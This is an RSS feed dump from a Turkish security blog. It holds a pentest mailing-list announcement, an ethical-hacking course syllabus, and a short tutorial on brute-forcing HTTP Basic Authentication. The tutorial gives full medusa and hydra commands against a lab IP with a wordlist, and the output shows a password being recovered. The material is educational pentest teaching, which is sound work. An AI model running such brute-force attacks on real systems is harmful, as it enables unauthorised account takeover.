pentest | Complexity is the enemy of Security http://blog.lifeoverip.net Life (Over) IP, Sun, 05 Aug 2018 19:08:05 +0000 en-US hourly 1 [Pentest-Tr] Türkçe Sızma Testleri E-posta Listesi http://blog.lifeoverip.net/2012/09/22/pentest-tr-turkce-sizma-testleri-e-posta-listesi/ http://blog.lifeoverip.net/2012/09/22/pentest-tr-turkce-sizma-testleri-e-posta-listesi/#respond Sat, 22 Sep 2012 04:25:14 +0000 http://blog.lifeoverip.net/?p=8614 Sahip olunan  bilişim sistemlerindeki güvenlik zafiyetlerinin üçüncü bir göz tarafından kontrol edilmesi ve raporlanması proaktif güvenliğin ilk adımlarındandır.  Kurumsal bilişim sistemlerine yönelik iç ve dış kaynaklı saldırılar karşısında güvenlik seviyelerini arttırma amaçlı düzenli sızma testlerinden geçirilmesi önerilmektedir. Özellikle son yıllarda … Continue reading

The post [Pentest-Tr] Türkçe Sızma Testleri E-posta Listesi first appeared on Complexity is the enemy of Security.

]]>
Sahip olunan  bilişim sistemlerindeki güvenlik zafiyetlerinin üçüncü bir göz tarafından kontrol edilmesi ve raporlanması proaktif güvenliğin ilk adımlarındandır.  Kurumsal bilişim sistemlerine yönelik iç ve dış kaynaklı saldırılar karşısında güvenlik seviyelerini arttırma amaçlı düzenli sızma testlerinden geçirilmesi önerilmektedir.
Özellikle son yıllarda gerek çeşitli standartlara uyumluluktan gerekse güvenliğe verilen önemin artmasından dolayı sızma testleri ve bu konuda çalışanlara önem ve talep  artmıştır.

Sızma testleri E-posta listesi Türkiye’de her geçen gün önemi artan bir konu olan sızma testleri konusunda Türkçe bilgi paylaşımının artması, yeni sızma test uzmanlarına tecrübelerin aktarılması, sızma testleri konusunda ipuçları, döküman ve eğitimlerin paylaşılması amacıyla  kurulmuştur.

Üyelik
Pentest-Tr listesi genel katılıma açık bir listedir. Listeye  üye olabilmek için [email protected] adresine boş bir e-posta gönderilmesi yeterlidir. Liste üyeliği için kullanılacak e-posta adresleri moderasyon ekibi tarafından incelenerek onay verilmektedir.

Şüphe uyandırıcı e-posta adreslerinin listeye üyeliği onaylanmamaktadır. (ad soyad kısmı gozukmeyen, [email protected] gibi)

Liste Konuları
Sızma testleri listesi güvenlik zafiyet degerlendirme, sızma testleri ve bunlara ait alt bileşenleri içerecek her konu hakkinda bilginin paylaşımı yapılabilir.

Genel olarak aşağıdaki konu başlıkları listenin öncelikli konularındandır.

  • Web Uygulama/ Servis Sızma Testleri (Web Application/service Penetration Test)
  • Kaynak Kod İncelemesi (Source CodeReview/Auditing)
  • Kablosuz Ağ Sızma Testleri (Wireless PenetrationTesting)
  • VOIP(Voice Over IP ) Sızma Testleri (VOIP Penetration Test)
  • Ağ Altyapısı Sızma Testleri (Network PenetrationTesting)
  • Sosyal Mühendislik Sızma Testleri (Social Engineering Penetration Test)
  • Yerel Ağ Sızma Testleri (LAN Penetration Testing)
  • Mobil  Uygulama Sızma Testleri (Mobile Application Penetration Test)
  • DDoS Saldırı Testleri (DdoS Pentest)
  • Sanallaştırma/Bulut Sistem Sızma Testleri (Cloud/Virtual Penetration Test)
  • Ağ ve Güvenlik Sistemlerine Yönelik Denetim Teknikleri
  • Sızma Test Araçları
  • Sızma Testleri Konusunda Eğitim ve Dökümanlar

Pentest-Tr E-posta Listesi Kuralları:

  • Listeye “Ticari Duyuru” mailleri gönderilmesi yasaktır.
  • Listede konuşulan tüm konular Google ve diğer arama motoru arşivlerine girmektedir ve arşivlerden silme imkanı bulunmamaktadır. [ilk uc ay haric]
  • Listeye gönderilen tüm mesajlar moderasyondan geçmektedir, 5651 sayılı kanuna göre liste sahiplerini zor durumda bırakacak mailler(hakaret vs), spam/reklam mailleri ve güvenlikle ilgili olmayan mailler  onaylanmamaktadır.
  • Siyasi ve ayrımcılık içeren mesajlar onaylanmamaktadır.
  • Doğrudan üye olup duyuru göndermek isteyen üyelerimizin mesajları yayınlanmayacaktır.
  • Aynı içerikte bir duyuru bir ay içerisinde bir kere gönderilebilir.

Gönderdiğiniz e-postalar listeye gitmiyorsa bunun sebepleri aşağıdaki maddelerden biri olabilir.

  • Gönderilen e-posta liste içeriğiyle alakalı değildir
  • Günderilen e-posta spam filtreleme sistemine takılmıştır
  • Gönderilen e-posta “reklam” içermektedir. (Teknik ifadelerle desteklenmiş ürün duyuruları, önerilerine izin verilmektedir.)
  • Hakaret içeren e-postalar
  • +1, destekliyorum gibi gereksiz e-postalar
  • Tamamı büyük harfle yazılmış e-postalar.

Liste Arşivi
Liste arşivi listeye yanlışlıkla gönderilebilecek hassas bilgilerin ifşa olmaması adına bir müddet sadece üyelere özel olacaktır.

İletişim
Geri bildirimler için lutfen [email protected] adresine e-posta gönderiniz.

The post [Pentest-Tr] Türkçe Sızma Testleri E-posta Listesi first appeared on Complexity is the enemy of Security.

]]>
http://blog.lifeoverip.net/2012/09/22/pentest-tr-turkce-sizma-testleri-e-posta-listesi/feed/ 0
Beyaz Şapkalı Hacker Eğitimi 4-8 Nisan 2011(Ankara) http://blog.lifeoverip.net/2011/03/22/beyaz-sapkali-hacker-egitimi-4-8-nisan-2011ankara/ http://blog.lifeoverip.net/2011/03/22/beyaz-sapkali-hacker-egitimi-4-8-nisan-2011ankara/#respond Tue, 22 Mar 2011 19:23:39 +0000 http://blog.lifeoverip.net/?p=3284 Beyaz şapkalı hacker(Certified Ethical Hacker) yetiştirme amaçlı bir eğitim olup diğer CEH tarzı eğitimlerden en önemli farkı içeriğinin Türkçe ve uygulamalı bir eğitim olmasıdır. Eğitimde işlenilen konular Ec-Council CEH V7 ile uyumludur. Bu eğitim için kontenjanımız dolmuştur.  Ankara’da açılacak eğitimlerden … Continue reading

The post Beyaz Şapkalı Hacker Eğitimi 4-8 Nisan 2011(Ankara) first appeared on Complexity is the enemy of Security.

]]>

Beyaz şapkalı hacker(Certified Ethical Hacker) yetiştirme amaçlı bir eğitim olup diğer CEH tarzı eğitimlerden en önemli farkı içeriğinin Türkçe ve uygulamalı bir eğitim olmasıdır. Eğitimde işlenilen konular Ec-Council CEH V7 ile uyumludur.

Bu eğitim için kontenjanımız dolmuştur.  Ankara’da açılacak eğitimlerden haberdar olmak için lütfen [email protected] adresine e-posta gönderiniz.

Eğitim Tarihleri 4-8 Nisan  2011 tarihleri arası(09:30-17:00 saatleri arası)
Eğitim Adresi İller Sok. No:4 Mebusevleri / Tandoğan / ANKARA (Gençlik Cad. Anıtkabir yanı)
Kayıt Olun Lütfen [email protected] adresine e-posta gönderiniz.
Eğitim Ücreti 2250 TL+KDV // 10 Mart  2011’e kadar yapılan kesin kayıtlarda %15 indirim imkanı bulunmaktadır
Eğitmen Huzeyfe ÖNAL
Eğitim Broşürü CEH
Capture The Flag Var
Eğitim İçeriği(Özet)
  • Linux sistem yönetimi ve güvenliği
    1. Linux işletim sistemi ve Linux dağıtımları
    1.1. Backtrack Linux dağıtımı ve temel bileşenleri
    1.2. Paket yönetimi, sistem ayarları
    2. Linux dosya sistemi
    2.1. Güvenlik açısından önemli dosya ve dizinler
    3. Temel sistem yönetimi komutları
    4. Kullanıcı yönetimi ve parola güvenliği
    5. Dosya, dizin erişim güvenliği
    6. Sistem güvenliğini ilgilendiren komutlar
    7. Güvenlik açısından loglama
    7.1. Kullanıcı denetim logları(auditd)
    8. Su/sudo kullanımı
    9. Gereksiz servislerin kapatılması ve Linux sistemlerin sıkılaştırılması
  • TCP/IP Protokol Ailesi Zafiyet Analizi
    1. Temel TCP/IP Protokolleri Analizi
    2. TCP/IP kaynaklı Açıklıklar
    3. IP ve ARP protokolleri zayıflık incelemesi
    4. Ip parçalanması ve kötüye kullanımı
    5. ICMP ‘nin kötü amaçlı kullanımı
    6. TCP ve UDP Zayıflık İncelemesi
    6.1. TCP/UDP’ye dayalı saldırı yöntemleri
    7. DNS Protokolü Zafiyetleri
    7.1. Dns cache snooping
    7.2. Dns cache poisoning
    8. DHCP Protokolü zafiyetleri
    9. Http/HTTPS protokolü zafiyetleri
  • Paket Analizi, Sniffing
    1. TCP/IP Paket Yapısı ve Analizi
    2. Sniffing Kavramı
    3. Sniffinge açık protokoller
    4. Sniffing Çeşitleri
    4.1. Aktif Modda Sniffing
    4.2. Pasif Modda Sniffing
    5. Paket analizi ve sniffing için kullanılan araçlar
    5.1. Wireshark, tcpdump, tshark, snop, snort, dsniff, urlsnarf, mailsnarf, sshmitm
    6. Wireshark & tcpdump ile paket analizleri
    6.1. Kaydedilmiş örnek paket incelemeleri
    6.2. Bağlantı problemi olan ağ trafiği analizi
    6.3. DNS & DHCP Trafiği Paket Analizi
    7. Ağ Trafiğinde adli bilişim analizi çalışmaları
    7.1. Ngrep ile ağ trafiğinde sızma tespiti
    7.2. İkili verilerden(pcap formatında) orijinal verileri elde etme
    7.3. Network miner, Netwitness araçlarıyla ağ trafiği analizi
    8. Yerel Ağlarda Snifferlari Belirleme ve Engelleme
  • Güvenlik Testlerinde Bilgi Toplama
    1. Bilgi toplama çeşitleri
    1.1. Aktif bilgi toplama
    1.2. Pasif bilgi toplama
    2. Internete açık servisler üzerinden Bilgi Toplama
    2.1. DNS Aracılığı ile
    2.2. HTTP Aracılığı ile
    2.3. SMTP üzerinden bilgi toplama
    2.4. SNMP aracılığıyla bilgi toplama
    3. Arama motorlarını kullanarak bilgi toplama
    3.1. Bir şirkete ait e-posta bilgilerinin bulunması
    3.2. Bir şirkete ait alt domain isimlerinin bulunması
    4. Google Hacking yöntemleri ve hazır araçlar
    5. Internete açık web sayfaları, e-posta listelerinden bilgi toplama
    6. Yeni nesi bilgi toplama aracı Maltego
  • TCP/IP İletişiminde Oturuma Müdahele
    1. TCP/IP Ağlarda Araya girme ve oturuma müdahele
    2. Çeşitli oturum müdahele yöntemleri
    2.1. ARP Spoofing
    2.2. IP Spoofing
    2.3. DNS Spoofing
    2.4. MAC Flooding
    2.5. Sahte DHCP Sunucuları ile bağlantı yönlendirme
    2.6. ICMP redirect paketleriyle oturuma müdahele
    3. Oturum Müdahele Araçları
    3.1. Ettercap, Dsniff, Cain & Abel
    3.2. Oturum Müdahele Örnekleri
    3.2.1. Telnet oturumuna müdahele
    3.2.2. http oturumuna müdahele
    3.2.3. SSL oturumunda araya girme
    3.2.4. SSH bağlantılarında araya girme
  • Güvenlik Duvarları(Firewall)
    1. Güvenlik Duvarı Temelleri
    1.1. Firewall(güvenlik duvarı) nedir, ne değildir?
    1.2. Paketlere hangi seviyeye kadar mudahele edebilirler
    1.3. Nat Kavramı
    1.4. NAT, Çeşitleri ve Uygulama alanları
    2. Packet Filtering
    2.1. Stateful packet filtering
    2.2. Stateless Packet Filtering
    3. Authentication(Yetkilendirme)
    4. Firewall Çeşitleri
    4.1. Uygulama seviyesi
    4.2. Bridge mode firewall
    4.3. Kişisel güvenlik duvarları
    4.4. Donanımsal/yazılımsal güvenlik duvarları
    4.5. Proxy mod güvenlik duvarı
    5. Firewall ürünleri
    5.1. Açık kaynak kodlu
    5.1.1. Linux iptables
    5.1.2. OpenBSD Packet Filter
    5.1.3. Pfsense
    5.2. Linux Iptables ile güvenlik duvarı uygulamaları
    5.2.1. İptables çalışma mantığı
    5.2.2. Port açma, port kapama
    5.2.3. Belirli ip adreslerine belirli servisler için erişim izni verme
    5.2.4. L7 filter ile uygulama seviyesi güvenlik duvarı kullanımı
    5.2.5. Ebtables ile L2 seviyesi güvenlik duvarı kullanımı
    5.3. Ticari güvenlik duvarı ürünleri
    5.3.1. Checkpoint, Netscreen, Fortinet, Kerio, Cisco ASA
    5.4. Firewall Testleri
    5.4.1. Antispoof testi
    5.4.2. Parçalanmış paketleri geçirme testleri
    5.4.3. Dayanıklılık testleri
    5.4.4. Isic, hping, Nmap ile test çalışmaları
    5.5. Firewall kural testleri
    5.5.1. Ftester, hping, firewallk ile test çalışmaları
  • Saldırı Tespit ve Engelleme Sistemleri
    1. IDS, IPS, NIDS, NIPS, HIPS Tanımları
    2. IDS/IPS(SALDIRI TESPIT VE ENGELLEME) Teknolojileri
    3. Host tabanlı IDS/IPS Sistemleri
    3.1. Ossec Kullanımı
    4. Ağ Tabanlı IDS/IPS Sistemleri
    5. Ağ tabanlı IDS’lerin çalışma yöntemleri
    6. IDS/IPS Yerleşim Planlaması
    7. Açık Kaynak kodlu IDS/IPS Yazılımları
    7.1. Snort, BroIds, Suricata
    8. Snort Saldırı Tespit ve Engelleme Sistemi
    8.1. Snort IDS Kurulumu
    8.2. Snort’u (N)IDS Olarak yapılandırma
    8.3. Snort kurallarını anlama ve yorumlama
    8.4. Snort’a saldırı kuralı yazma
    8.5. Saldırı loglarını inceleme ve yorumlama
    8.6. Snort’u IPS olarak Kullanma
    8.7. Snort yönetim araçları
    9. Tuzak (Honeypot) Sistemler
    9.1. Kfsensor ile honeypot uygulaması
    9.2. Honeyd ile honeypot çalışmaları
  • Firewall, IDS/IPS ve İçerik Filtreleme Sistemlerini Atlatma
    1. Firewall atlatma teknikleri
    1.1. Mac sppofing Yöntemi ile
    1.2. IP Spoofing Yöntemi ile
    1.3. Tersine kanal açma yöntemi
    1.4. Protokol Tünelleme Yöntemleri
    1.5. SSh Tünelleme
    1.6. VPN Tünelleri
    2. IPS/IDS atlatma teknikleri
    2.1. Şifreli bağlantılar ve IPS Sistemler
    2.2. Şifreli bağlantılar üzerinden atlatma testleri
    2.2.1. SSH tünelleme
    2.2.2. Opelssl
    2.2.3. Nssl
    2.2.4. HTTPS/SSL VPN kullanımı
    2.3. Parçalanmış paketlerle IDS atlatma
    2.4. Tuzak sistemler aracılığı ile port tarama
    2.5. Proxy sistemler üzerinden port tarama
    3. İçerik filtreleme atlatma teknikleri
    3.1. HTTPS bağlantıları üzerinden atlatma
    3.2. Google & Yahoo araçlarını kullanarak atlatma teknikleri
    3.3. Proxy kullanarak içerik filtreleyicileri atlatma
    3.3.1. Cgi-Proxy(http/https)
    3.3.2. SSH Socks Proxy
    3.3.3. Açık Proxyler kullanılarak atlatma
    3.4. Protokol Tünelleme Yöntemleri
    3.4.1. Tek port, protokol açıksa tüm portlar açıktır ilkesi
    3.4.2. Mail Trafiği üzerindHTTP Trafiği aktarımı
    3.4.3. DNS protokolü üzerinden tüm trafiğin aktarımı
    3.4.4. SSH Protokolü üzerinden tüm trafiğin aktarımı
    3.4.5. AntiSansür yazılımları aracılığı ile atlatma teknikleri
    3.4.6. TOR & Ultrasurf
    3.5. Atlatma Yöntemlerine karşı korunma Yolları
  • Host/Ağ/Port Keşif Ve Tarama Araçları
    1. Host keşfetme ve Port Tarama
    2. Host/Port Açıklık Kavramları
    2.1. Bir host/port hangi durumda açık gözükür, hangi durumda kapalı
    3. Host/Port Tarama Neden Önemlidir?
    4. Tarama Çeşitleri
    4.1.1. TCP üzerinden port tarama
    4.1.1.1. SYN Tarama, FIN Tarama, XMAS , ACK, NULL …
    4.1.2. UDP Port tarama
    4.1.3. IP ve ICMP Tarama
    5. İşletim Sistemi Belirleme ve versiyon belirleme
    6. Port Tarama Araçları
    6.1.1. Hping ile Port tarama uygulamaları
    6.1.2. Nmap ile Port tarama uygulamaları
    7. Nmap ile gelişmiş port tarama yöntemleri
    8. Nmap Scripting Engine(NSE) Kullanımı
    9. Diğer bilinen port tarama araçları
    9.1.1. Unicornscan
    9.1.2. Scanrand
    9.1.3. Xprobe
    10. Saldırı Tespit Sistemleri Port taramalarını nasıl algılar ve engeller
  • Zaafiyet Tarama ve Bulma Sistemleri
    1. Zaafiyet tanımı ve çeşitleri
    2. Çeşitli ticari zaafiyet tarama araçları
    2.1. Qualys, Mcafee Foundstone, Nexpose, Eyee Retina
    3. Açık kaynak kodlu zaafiyet tarama araçları
    3.1. . Nessus, Inguma, W3af ..
    4. Nessus ile otomatize güvenlik açığı keşfi
    4.1. Nessus çalışma mantığı
    5. Nessus pluginleri
    6. Knowledge Base mantığı
    7. Nessus tarama yapısı
    7.1. Yerel sistem üzerinden tarama
    7.2. Ağ üzerinden tarama
    8. Nessus ile güvenlik açığı bulma
    9. Nessus tarama raporları
  • Exploit Çeşitleri ve Metasploit Kullanımı
    1. Exploit Geliştirme ve Çalıştırma Araçları
    1.1. Core Impact, Canvas, Metasploit
    2. Metasploit Geliştirme Süreci
    2.1. Metasploit Versiyonları
    2.2. Güncel sürüm özellikleri
    2.3. Yol Haritası
    2.4. Metasploit kullanımı ile ilgili genel terim ve tanımlar
    3. Temel Metasploit kullanımı
    3.1. Kurulum
    3.2. Çalışma yapısı
    3.3. Bileşenleri
    3.4. Metasploit yönetim arabirimleri
  • DOS/DDOS Saldırıları ve Korunma Yöntemleri
    1. Denial Of Service Atakları
    1.1. Çeşitleri
    1.2. Amaçları
    1.3. DOS Atak Çeşitleri
    1.3.1. Smurf, Ping Of Death, TearDrop, SYN Flood, UDPFlood
    2. DDOS Atakları
    3. DDOS Çeşitleri ve Araçları
    3.1. SYN Flood, UDPFlood, icmpflood, smurf, fraggle, http flood
    4. DDOS amaçlı kullanılan WORMlar.
    5. Ircbot, zombie, BotNet Kavramları
    6. Botnet kullanım alanları
    7. Fast-Flux networkler ve çalışma yapıları
    8. DNS sunuculara yönelik DDOS saldırıları
    9. Kablosuz Ağlara yapilan DOS saldirilari
    10. DOS/DDOS Saldırılarından Korunma Yolları
    10.1. Syn cookie, syn proxy, syn cache yöntemleri
  • Kablosuz Ağlar Ve Güvenlik
    1. Kablosuz Aglara Giriş
    1.1. Tanımlar
    1.2. Kablosuz Ağ Çeşitleri
    1.3. Kablosuz Ağ Standartları
    1.4. Linux/Windows işletim sistemi ile kablosuz ağ kullanımı
    2. Kablosuz Aglarda Tehlikeler
    3. Sahte Access Pointler ve Zararları
    4. WLAN keşif yöntemleri
    4.1. Aktif Keşif yöntemleri
    4.2. Pasif Keşif yöntemleri
    5. Pasif mod Trafik Analizi
    6. WLAN’lerde Temel Güvenlik
    6.1. SSID Gizleme
    6.2. MAC Adres Filtreleme
    6.3. WEP Şifreleme
    7. Aircrack-ng test araçları ailesi
    8. Kablosuz Ağlarda Denial Of service atakları
    9. WEP/WPA/WPA-II Güvenliği
    9.1. WEP/WPA/WPA-II Analizi
    9.2. Temel XOR Bilgisi
    9.3. WEP’in kırılması
    9.4. WPA güvenliği
    10. Halka Açık kablosuz ağlarda Tehlikeler
    10.1. Wifizoo ile erişim bilgilerinin kötüye kullanımı
    10.2. Karmasploit ile aktif kullanıcılara saldırı
    11. Kablosuz Ağlarda Saldırı Tespit Sistemi Kullanımı
  • Web Uygulama Güvenliği ve Hacking Yöntemleri
    1. Web Uygulamaları ve http
    1.1. http protokol detayları
    1.2. Web uygulama bileşenleri
    2. Geleneksel güvenlik anlayışı ve web
    uygulama güvenliği
    3. Web uygulama güvenliğinde kavramlar
    3.1. Hacking, Defacement, Rooting, shell vs
    4. Web uygulama/site güvenliği nelere bağlıdır?
    5. Web uygulamalarında hacking amaçlı bilgi toplama
    5.1. Web sunucu, uygulama versiyon keşfi
    5.2. Hata mesajlarından bilgi toplama
    5.3. Google kullanarak bilgi toplama
    5.4. Alt dizin, dosya keşfi
    5.5. Admin panel keşfi
    6. Web güvenlik testlerinde kişisel Proxyler
    6.1. Paros Proxy, WEbScarab, Burp Proxy
    6.2. Firefox eklentileri
    7. İstemci taraflı kontrolleri aşma
    8. OWASP Top 10 açıklık rehberi
    9. XSS, CSRF açıklıkları ve kötüye değerlendirme
    9.1. XSS ,CSRF nedir, ne değildir?
    9.2. XSS, CSRF ne amaçla kullanılır?
    9.3. Çeşitleri nelerdir ve nasıl engellenebilir
    10. SQL Injection zafiyetleri ve hacking amaçlı kullanımları
    10.1. Dinamik web uygulamaları ve SQL
    10.2. SQLi neden kaynaklanır, çeşitleri nelerdir?
    10.3. SQLi örnekleri
    10.4. Google’dan otomatik SQLi açıklığı arama
    10.5. SQLi araçları ve kullanımı
    10.5.1. Sqlmap, SQLi Finder, Pangolin
    11. File inclusion zafiyetleri ve hacking amaçlı kullanımı
    11.1. File inclusion çeşitleri
    11.1.1. Local File inclusion
    11.1.2. Remote file inclusion
    12. Shell Çeşitleri ve kullanım amaçları
    12.1. Shell kavramı ve kullanımı
    12.2. PHP, ASP ve JSP shell çeşitleri
    12.3. Sık kullanılan shell yazılımları
    13. Web sunucularına yönelik DOS saldırıları
    14. Web uygulama güvenlik duvarı yazılımları ve çalışma yöntemleri
    15. Web uygulama güvenlik test yazılımları ve örnek sayfalar
    16. Http authentication yöntemleri ve karşı saldırılar
  • VPN ve Şifreleme Teknolojileri
    1. Şifreleme algoritmaları
    2. Şifreleme algoritmalarına yönelik sadırılar
    3. Parola ve şifre kavramı
    4. Şifreleme ve kodlama farklılıkları
    5. Parola çeşitleri
    6. Şifreleme saldırıları
    7. Brute force ataklar, rainbow table kullanımı, hibrid ataklar
    8. Linux, Windows, Cisco sistemlerin parola güvenliği
    9. Parolaların hashlenmesi ve salt değeri kullanımı
    10. Parola kırma araçları
    11. Sayısal Sertifikalar
    12. Disk Şifreleme
    13. SSL Protokolü inceleme
    13.1. SSL Protokol yapısı
    13.2. SSL TLS farkları
    14. SSL Protokolünde araya girme ve veri okuma
    15. VPN Teknolojileri ve Çalışma yöntemleri
    16. OpenVPN ile SSL VPN Uygulamaları
    17. SSH Protokolü
    18. SSH ile Tünelleme
    19. SSL VPN uygulamalarında araya girme
  • Son Kullacıya Yönelik Saldırı Çeşitleri ve Yöntemleri
    1. Son kullanıcı tanımı
    2. Sunuculara yönelik saldırılar & istemcilere yönelik saldırılar
    3. Son kullanıcıya yönelik saldırılarda
    neden artış var?
    4. Son kullanıcıya yönelik saldırı çeşitleri
    4.1. Phishing
    4.2. USB disklerdeki güvenlik problemi
  • Güvenlik Amaçlı Kullanılan Firefox Eklentileri
    1. User Agent Switcher
    2. Tamper Data eklentisi
    3. HTTP Live Headers
    4. HackBar Eklentisi
    5. FoxyProxy Eklentisi
    6. Fire Encrypter
    7. TrashMail.net Eklentisi
    8. Xss-Me/SqlInject-Me eklentileri
    9. Passive Recon Eklentisi
    10. ProxySel Eklentisi
    11. Firebug Eklentisi
    12. User Agent Switcher
    13. Firecat Framework

Eğitim tanımı:

Beyaz Şapkalı Hacker eğitimi hackerların sistemlere sızmada kullandığı yöntemleri ve araçları detaylı ve uygulamalı bir şekilde anlatılarak proaktif güvenlik anlayışı kazandırma amaçlı bir eğitimdir. Benzeri eğitimlerden farkı eğitim içeriğinde gerçek dünyaya uygun uygulamaların kullanılması ve pratiğe önem verilmesidir. Beyaz şapkalı hacker eğitimi Ec-Council Certified Ethical Hacker v7 ile uyumludur.

Kimler Katılmalı:

* Sistem yöneticileri
* Ağ yöneticileri ve operatörleri
* Ağ güvenliği yönetici ve operatörleri
* Bilgi güvenliği uzmanları
* Adli bilişim uzmanları
* Bilişim hukuku alanı çalışanları

İşleyiş:

Eğitim gerçek sistemler üzerinde uzman eğitmenler eşliğinde uygulamalı olarak gerçekleştirilecektir.

Eğitim materyalleri:

  • Eğitime özel Linux dağıtımı Vmware imajı
  • Eğitim notlarına bir yıllık online erişim hakkı
  • Katılım sertifikası

Katılımcıdan beklenenler:

Kişisel dizüstü bilgisayarı(Laptop)

Laptop gereksinimleri

* Windows XP, Windows 7 veya Linux
* Virtualbox, Vmware Workstation
* Admin hesabı
* 2GB ram

Eğitim Süresi:
5 gün

Eğitim Ücreti:
2250 TL+KDV , 10 Mart 2011 tarihine kadar yaptırılan kesin kayıt(+ödeme)larda %15 indirim imkanı sunulmaktadır.

Ön Gereksinimler:

The post Beyaz Şapkalı Hacker Eğitimi 4-8 Nisan 2011(Ankara) first appeared on Complexity is the enemy of Security.

]]>
http://blog.lifeoverip.net/2011/03/22/beyaz-sapkali-hacker-egitimi-4-8-nisan-2011ankara/feed/ 0
Basic Authentication Korumalı Sayfalara Bruteforce Denemesi http://blog.lifeoverip.net/2011/02/20/basic-authentication-korumali-sayfalara-bruteforce-denemesi/ http://blog.lifeoverip.net/2011/02/20/basic-authentication-korumali-sayfalara-bruteforce-denemesi/#respond Sun, 20 Feb 2011 14:35:17 +0000 http://blog.lifeoverip.net/?p=3260 Parola, günümüz güvenlik dünyasının en zayıf halkalarından biridir. Güvenliğine ciddi önem verilmiş sistemler birden fazla yetkilendirme sistemi kullanarak bu zaafiyeti bir oranda kapatmaya çalışırlar. Fakat yeteri önem verilmemiş sistemlerde basit parolaların kullanımını günümüzde sıkça  görüyoruz. Bu kısa yazı basic authentication … Continue reading

The post Basic Authentication Korumalı Sayfalara Bruteforce Denemesi first appeared on Complexity is the enemy of Security.

]]>

Parola, günümüz güvenlik dünyasının en zayıf halkalarından biridir. Güvenliğine ciddi önem verilmiş sistemler birden fazla yetkilendirme sistemi kullanarak bu zaafiyeti bir oranda kapatmaya çalışırlar.

Fakat yeteri önem verilmemiş sistemlerde basit parolaların kullanımını günümüzde sıkça  görüyoruz. Bu kısa yazı basic authentication kullanılarak meraklı gözlerden uzak tutulmaya çalışılan sayfalara yönelik bruteforce denemelerinin nasıl gerçekleştirileceğini göstermektedir.

Hedef sistemin basic-auth kullandığı nasıl anlaşılır?

Hedef sistemde basic-auth ile korunduğu düşünülen sayfa istenerek dönen cevaptaki “WWW-Authenticate” satırı kontrol edilirse hangi authentication tipinin kullanıldığı anlaşılır.

root@bga-seclabs:~# telnet www.bga.com.tr 80
Trying 91.93.119.87…
Connected to www.bga.com.tr.
Escape character is ‘^]’.
GET /wp-login.php HTTP/1.1
Host:www.bga.com.tr

HTTP/1.1 401 Authorization Required
Date: Sat, 19 Feb 2011 19:40:49 GMT
Server: Apache
WWW-Authenticate: Basic realm=”Yaramazlik yasak!”
Content-Length: 401
Content-Type: text/html; charset=iso-8859-1

401 Authorization Required

Bu aşamadan sonra medusa, hydra veya Ncrack yazılımları kullanılarak bruteforce denemeleri gerçekleştirilebilir.

Bruteforce Çalışmalarında Medusa Kullanımı

#medusa -M http -m USER-AGENT:”Firefox-Explorer-99.1″ -m DIR:/gizli-alan -m AUTH:BASIC -h 10.10.10.1 -u bga -P bga-wordlist22




ACCOUNT CHECK: [http] Host: 10.10.10.1 (1 of 1, 0 complete) User: bga (1 of 1, 0 complete) Password: zzzzzz (4406 of 4417 complete)
ACCOUNT CHECK: [http] Host: 10.10.10.1 (1 of 1, 0 complete) User: bga (1 of 1, 0 complete) Password: zzzzzzy (4407 of 4417 complete)
ACCOUNT CHECK: [http] Host: 10.10.10.1 (1 of 1, 0 complete) User: bga (1 of 1, 0 complete) Password: zzzzzzz (4408 of 4417 complete)
ACCOUNT CHECK: [http] Host: 10.10.10.1 (1 of 1, 0 complete) User: bga (1 of 1, 0 complete) Password: zzzzzzz (4409 of 4417 complete)
ACCOUNT CHECK: [http] Host: 10.10.10.1 (1 of 1, 0 complete) User: bga (1 of 1, 0 complete) Password: zzzzzzzthis (4410 of 4417 complete)
ACCOUNT CHECK: [http] Host: 10.10.10.1 (1 of 1, 0 complete) User: bga (1 of 1, 0 complete) Password: zzzzzzzz (4411 of 4417 complete)
ACCOUNT CHECK: [http] Host: 10.10.10.1 (1 of 1, 0 complete) User: bga (1 of 1, 0 complete) Password: zzzzzzzz (4412 of 4417 complete)
ACCOUNT CHECK: [http] Host: 10.10.10.1 (1 of 1, 0 complete) User: bga (1 of 1, 0 complete) Password: zzzzzzzzzz (4413 of 4417 complete)
ACCOUNT CHECK: [http] Host: 10.10.10.1 (1 of 1, 0 complete) User: bga (1 of 1, 0 complete) Password: zzzzzzzzzzzzz (4414 of 4417 complete)
ACCOUNT CHECK: [http] Host: 10.10.10.1 (1 of 1, 0 complete) User: bga (1 of 1, 0 complete) Password: zzzzzzzzzzzzzzzzzz (4415 of 4417 complete)
ACCOUNT CHECK: [http] Host: 10.10.10.1 (1 of 1, 0 complete) User: bga (1 of 1, 0 complete) Password: {log} (4416 of 4417 complete)
ACCOUNT CHECK: [http] Host: 10.10.10.1 (1 of 1, 0 complete) User: bga (1 of 1, 0 complete) Password: 0u7b00k (4417 of 4417 complete)

ACCOUNT FOUND: [http] Host: 10.10.10.1 User: bga Password: 0u7b00k [SUCCESS]

Bruteforce Çalışmalarında Hydra Kullanımı

# hydra -l bga -P bga-wordlist22 -f 10.10.10.1 http-get /test -vV
Hydra v5.4 (c) 2006 by van Hauser / THC – use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2010-11-28 11:16:43
[DATA] 16 tasks, 1 servers, 4417 login tries (l:1/p:4417), ~276 tries per task
[DATA] attacking service http-get on port 80

[ATTEMPT] target 10.10.10.1 – login “bga” – pass “01214nd0” – child 26 – 675 of 4417
[ATTEMPT] target 10.10.10.1 – login “bga” – pass “0123” – child 27 – 676 of 4417
[ATTEMPT] target 10.10.10.1 – login “bga” – pass “012301279x” – child 28 – 677 of 4417
[ATTEMPT] target 10.10.10.1 – login “bga” – pass “012307120chi1u5” – child 29 – 678 of 4417
[ATTEMPT] target 10.10.10.1 – login “bga” – pass “0123071246in3” – child 0 – 679 of 4417
[ATTEMPT] target 10.10.10.1 – login “bga” – pass “0123071246u5” – child 1 – 680 of 4417
[ATTEMPT] target 10.10.10.1 – login “bga” – pass “01230c41294” – child 2 – 681 of 4417
[ATTEMPT] target 10.10.10.1 – login “bga” – pass “01230d0n” – child 3 – 682 of 4417
[ATTEMPT] target 10.10.10.1 – login “bga” – pass “01230d0n7” – child 4 – 683 of 4417
[ATTEMPT] target 10.10.10.1 – login “bga” – pass “01230d0n70id” – child 5 – 684 of 4417
[ATTEMPT] target 10.10.10.1 – login “bga” – pass “01230d0n7id43” – child 6 – 685 of 4417
[ATTEMPT] target 10.10.10.1 – login “bga” – pass “01230d0n7in3” – child 7 – 686 of 4417
[ATTEMPT] target 10.10.10.1 – login “bga” – pass “01230d0x4” – child 8 – 687 of 4417
[ATTEMPT] target 10.10.10.1 – login “bga” – pass “01230ph45i5” – child 9 – 688 of 4417
